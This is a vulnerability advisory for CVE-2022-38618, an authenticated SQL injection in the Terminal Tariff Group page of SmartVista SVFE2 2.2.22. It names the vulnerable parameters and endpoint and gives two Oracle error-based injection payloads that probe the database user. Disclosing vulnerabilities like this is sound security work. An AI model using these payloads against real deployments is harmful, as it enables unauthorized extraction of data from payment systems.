> For the complete documentation index, see [llms.txt](https://dtro.gitbook.io/note_cve/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dtro.gitbook.io/note_cve/sql-injection-in-terminal-tariff-group-feature-of-smartvista-svfe2-version-2.2.22-cve-2022-38618.md).

# SQL Injection in Terminal Tariff Group feature of SmartVista SVFE2 version 2.2.22  (CVE-2022-38618)

### CVE-2022-38618

**Exploit Title:** SQL Injection in Terminal Tariff Group feature of SmartVista SVFE2 version 2.2.22

**Date:** 26/07/2022

**Exploit Author:** Trong Pham aka Dtro of VietSunshine Cyber Security Services

**Vendor Homepage:** <https://www.bpcbt.com/>

**Affected Version(s):** SmartVista SVFE2 version 2.2.22

**Description:** SmartVista SVFE2 version 2.2.22 and earlier are affected by an SQL Injection vulnerability. An authenticated users could inject SQL query to "UserForm:j\_id88,UserForm:j\_id90,UserForm:j\_id92" parameters in /SVFE2/pages/feegroups/country\_group.jsf to dump all databases.

**Steps to reproduce:**

* An attacker requires an account on the SmartVista SVFE2. An attacker can use a quote character to break query string and inject sql payload to "UserForm:j\_id88,UserForm:j\_id90,UserForm:j\_id92" parameter in /SVFE2/pages/feegroups/country\_group.jsf. Response data could help an attacker identify whether an injected SQL query is correct or not.
* Example of injecting SQL to "UserForm:j\_id90" parameter:
  * X'||(SELECT+CASE+WHEN+(user='Right\_user')+THEN+TO\_CHAR(1/0)+ELSE+NULL+END+FROM+dual)||'X -> Correct query -> return data
  * X'||(SELECT+CASE+WHEN+(user='Wrong\_user')+THEN+TO\_CHAR(1/0)+ELSE+NULL+END+FROM+dual)||'X -> Wrong query -> Return data with error messages (Database error "ORA-01476")
